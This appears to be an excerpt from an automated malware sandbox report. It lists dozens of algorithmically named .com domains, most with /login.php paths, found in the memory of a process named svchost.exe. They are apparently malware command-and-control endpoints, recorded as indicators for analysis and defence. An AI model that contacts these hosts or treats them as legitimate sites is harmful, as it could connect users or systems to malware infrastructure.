Source: svchost.exe, 00000002.00000003.1838938821.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1835708168.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzydal.com/login.phpc
Source: svchost.exe, 00000002.00000003.1936983553.0000000002F32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1947234961.0000000002F33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzydog.com/login.php
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzyduq.com/
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898540147.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzyduq.com/login.php
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889837686.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzygop.com/login.php
Source: svchost.exe, 00000002.00000003.1816439282.00000000008FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1817764559.0000000008AE3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1816431355.0000000008AE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzyguv.com/
Source: svchost.exe, 00000002.00000003.1838938821.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1832918592.0000000002F33000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1816431355.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1818447804.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1822071432.0000000002F28000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1816434149.0000000002FEA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1835708168.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1816435063.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1817764559.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzyguv.com/login.php
Source: svchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878975656.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzyjyg.com/login.php
Source: svchost.exe, 00000002.00000003.1947093650.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzylyp.com/H
Source: svchost.exe, 00000002.00000003.1947093650.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1920326328.0000000008B58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1920125222.0000000002F32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1929708122.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1932220446.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzylyq.com/login.php
Source: svchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889837686.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzymev.com/login.php
Source: svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzypav.com/
Source: svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902583004.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916356389.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1906808351.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1906280204.0000000008ABD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://puzypav.com/login.php
Source: svchost.exe, 00000002.00000003.1743948651.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1752825184.0000000002F06000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1748028273.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qetyxiq.com/login.php
Source: svchost.exe, 00000002.00000003.1929704331.0000000002F66000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1927868934.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1947165935.0000000002F67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937315639.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1933122469.0000000002F60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qetyxiv.com/login.php
Source: svchost.exe, 00000002.00000003.1936983553.0000000002F32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexyfag.com/login.php
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexyfuq.com/
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexyhap.com/login.php
Source: svchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexykug.com/login.php
Source: svchost.exe, 00000002.00000003.1933269002.0000000002F32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1931887826.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexynyq.com/login.php
Source: svchost.exe, 00000002.00000003.1947093650.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1920326328.0000000008B58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1929708122.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1932220446.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexyreg.com/login.php
Source: svchost.exe, 00000002.00000003.1870965504.0000000002F45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1875548000.0000000002F49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1871321713.0000000002FE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexyriq.com/
Source: svchost.exe, 00000002.00000003.1870965504.0000000002F45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1875548000.0000000002F49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexyriq.com/H
Source: svchost.exe, 00000002.00000003.1870864138.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1874490418.0000000002F33000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1872098357.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1870410496.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1874254950.0000000002F28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexyriq.com/login.php
Source: svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1901770860.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916356389.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1906808351.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902913995.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexysev.com/login.php
Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916662047.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916085702.0000000002FE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexytil.com/login.php
Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qexyvyg.com/login.php
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocygim.com/
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899969240.0000000008AE3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocygim.com/login.php
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889837686.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889542311.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocyjet.com/login.php
Source: svchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1877431958.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocykif.com/login.php
Source: svchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocyquc.com/
Source: svchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878975656.0000000008AE3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878419703.0000000002F66000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878975656.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocyquc.com/login.php
Source: svchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1871321713.0000000002FE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocyrom.com/
Source: svchost.exe, 00000002.00000003.1929613840.0000000002F32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofybet.com/login.php
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878975656.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofybic.com/login.php
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofycyk.com/login.php
Source: svchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889837686.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofydut.com/login.php
Source: svchost.exe, 00000002.00000003.1874151632.0000000008A7F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1870864138.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1874490418.0000000002F33000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1874254950.0000000002F28000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1871321713.0000000002FE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofygaf.com/login.php
Source: svchost.exe, 00000002.00000003.1943881239.0000000002F05000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1944468458.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1961288192.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1346492801.0000000002FF8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1344512429.0000000002FF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofygum.com/login.php
Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofyjom.com/
Source: svchost.exe, 00000002.00000003.1919445293.0000000008A29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1947093650.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1920658467.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1920326328.0000000008B58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1920125222.0000000002F32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1929708122.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1932220446.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofymif.com/login.php
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofypam.com/login.php
Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofyqek.com/
Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofyqek.com/0;
Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofyqek.com/login.php
Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofyruc.com/login.php
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vofyzof.com/
Source: svchost.exe, 00000002.00000003.1816439282.00000000008FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojybek.com/
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889837686.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojybim.com/login.php
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojycec.com/
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojycec.com/H
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojycec.com/login.php
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889837686.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojyduf.com/login.php
Source: svchost.exe, 00000002.00000003.1929704331.0000000002F66000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1947093650.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1927868934.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1929708122.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1947165935.0000000002F67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937315639.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1932220446.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1933122469.0000000002F60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojygym.com/login.php
Source: svchost.exe, 00000002.00000003.1870864138.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1874490418.0000000002F33000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1873643375.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1870410496.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1874254950.0000000002F28000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojyjyc.com/login.php
Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojykyf.com/login.php
Source: svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899969240.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902583004.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902913995.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojyrum.com/login.php
Source: svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vojyzik.com/
Source: svchost.exe, 00000002.00000003.1838938821.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1838350942.0000000002F25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1835708168.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volybec.com/login.php
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1915969207.0000000002F25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volybut.com/login.php
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volydyk.com/
Source: svchost.exe, 00000002.00000003.1838938821.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1832918592.0000000002F33000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1816431355.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1822093505.0000000002F64000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1822071432.0000000002F28000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1835708168.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1816435063.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1817764559.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volygyf.com/login.php
Source: svchost.exe, 00000002.00000003.1753426788.0000000008ADF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743948651.0000000008ADF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volyjok.com/H
Source: svchost.exe, 00000002.00000003.1753426788.0000000008ADF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743948651.0000000008ADF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volyjok.com/http://volyjok.com/
Source: svchost.exe, 00000002.00000003.1743948651.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1752825184.0000000002F06000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1748028273.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volyjok.com/login.php
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878975656.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volyjym.com/login.php
Source: svchost.exe, 00000002.00000003.1947093650.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1920326328.0000000008B58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1929708122.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1932220446.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volykek.com/login.php
Source: svchost.exe, 00000002.00000003.1870864138.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1874490418.0000000002F33000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1872098357.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1870410496.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1874254950.0000000002F28000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1871321713.0000000002FE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volykit.com/login.php
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volymaf.com/login.php
Source: svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volypof.com/
Source: svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volypof.com/login.php
Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volyzic.com/
Source: svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonybuk.com/H
Source: svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1906280204.0000000008ABD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonybuk.com/login.php
Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonydem.com/
Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonydem.com/login.php
Source: svchost.exe, 00000002.00000003.1868655611.0000000002F05000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1868461374.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1864780566.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonydik.com/login.php
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyjef.com/login.php
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonymoc.com/
Source: svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898540147.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonymoc.com/login.php
